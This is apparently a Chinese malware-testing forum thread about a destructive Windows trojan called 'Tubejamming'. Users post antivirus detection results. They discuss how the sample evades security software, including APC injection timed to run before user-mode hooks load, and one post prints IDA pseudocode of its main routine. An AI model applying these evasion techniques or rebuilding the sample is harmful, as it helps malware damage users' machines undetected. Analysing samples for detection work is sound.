Tubejamming

Komeiji-Reimu

now 卡巴 kill

组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: UDS:Trojan.Win32.DiskWriter.gen
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: Tubejamming.exe
对象路径: D:\Users\\Desktop\Tubejamming
对象的 MD5: 6EE6BD3DE96FE9D2906791C8C1F655DB
原因: 云保护

GreatMOLA

Avira

TR/Crypt.ZPACK.Gen7

东南大学

CS解压杀

Qiyuanqwq

免杀原因:
ida生成的伪代码
用c关键字规避敏感api查杀，但是动态别想
运用apc注入，使恶意负载早于杀软的hookdll加载绕过r3hook
但是现在的edr们加载已经早于nttestalert了吧awa

Qiyuanqwq

东南大学 发表于 2024-6-30 22:50
CS解压杀

没处理cs再不杀就可以卸载了

Revitalize

腾讯电脑管家 miss

DisaPDB

Qiyuanqwq 发表于 2024-6-30 23:36
免杀原因:
ida生成的伪代码
用c关键字规避敏感api查杀，但是动态别想

并不
其实很多EDR只是Hook NtAllocateReserveObject而已（）

DisaPDB

1. int __cdecl main(int argc, const char **argv, const char **envp)
   
2. {
   
3.   HANDLE CurrentProcess; // eax
   
4.   HANDLE Thread; // edi
   
5.   HMODULE ModuleHandleA; // eax
   
6.   void (*NtTestAlert)(void); // ebx
   
7.   int v7; // edi
   
8.   int v8; // ebx
   
9.   int v10; // [esp+0h] [ebp-8h] BYREF
   
10. 
    
11.   if ( MessageBoxW(0, &Text, L"Tubejamming", 0x34u) != 6 || (v10 = 1, !dword_41A3BC) || !dword_41A3C4 )
    
12.   {
    
13.     _loaddll(0);
    
14. LABEL_14:
    
15.     _loaddll(0);
    
16.     __debugbreak();
    
17.   }
    
18.   dword_41A3BC(20, 1);
    
19.   CurrentProcess = GetCurrentProcess();
    
20.   dword_41A3C4(CurrentProcess, 29, &v10, 4);
    
21.   Thread = CreateThread(0, 0, sub_401080, 0, 0, 0);
    
22.   ModuleHandleA = GetModuleHandleA("ntdll");
    
23.   NtTestAlert = (void (*)(void))GetProcAddress(ModuleHandleA, "NtTestAlert");
    
24.   QueueUserAPC((PAPCFUNC)pfnAPC, Thread, 0);
    
25.   if ( !NtTestAlert )
    
26.     goto LABEL_14;
    
27.   NtTestAlert();
    
28.   WaitForSingleObject(Thread, 0xFFFFFFFF);
    
29.   CloseHandle(Thread);
    
30.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4010C0, 0, 0, 0);
    
31.   v7 = 30;
    
32.   do
    
33.   {
    
34.     CreateThread(0, 0, sub_4012B0, 0, 0, 0);
    
35.     --v7;
    
36.   }
    
37.   while ( v7 );
    
38.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
39.   Sleep(0x1388u);
    
40.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
41.   Sleep(0x1388u);
    
42.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
43.   Sleep(0x2710u);
    
44.   CreateThread(0, 0, sub_401A70, 0, 0, 0);
    
45.   Sleep(0x4E20u);
    
46.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4018F0, 0, 0, 0);
    
47.   Sleep(0xEA60u);
    
48.   byte_419930 = 0;
    
49.   Sleep(0x1F4u);
    
50.   byte_419930 = 1;
    
51.   v8 = 20;
    
52.   do
    
53.   {
    
54.     CreateThread(0, 0, sub_4012B0, 0, 0, 0);
    
55.     --v8;
    
56.   }
    
57.   while ( v8 );
    
58.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
59.   Sleep(0x2710u);
    
60.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
61.   Sleep(0x2710u);
    
62.   CreateThread(0, 0, sub_401580, 0, 0, 0);
    
63.   Sleep(0x3E8u);
    
64.   CreateThread(0, 0, sub_4019D0, 0, 0, 0);
    
65.   Sleep(0x1388u);
    
66.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4011D0, 0, 0, 0);
    
67.   Sleep(0x2710u);
    
68.   CreateThread(0, 0, sub_4015A0, 0, 0, 0);
    
69.   Sleep(0x3A98u);
    
70.   CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4018F0, 0, 0, 0);
    
71.   Sleep(0x2710u);
    
72.   byte_419930 = 0;
    
73.   sub_401A90();
    
74.   if ( dword_41A3BC && dword_41A3B8 )
    
75.   {
    
76.     dword_41A3BC(19, 1);
    
77.     dword_41A3B8(-1073741824, 0, 0, 0, 6, &v10);
    
78.   }
    
79.   return 0;
    
80. }

复制代码

安静的Snow

norton v22 kill

BitterLotus

DI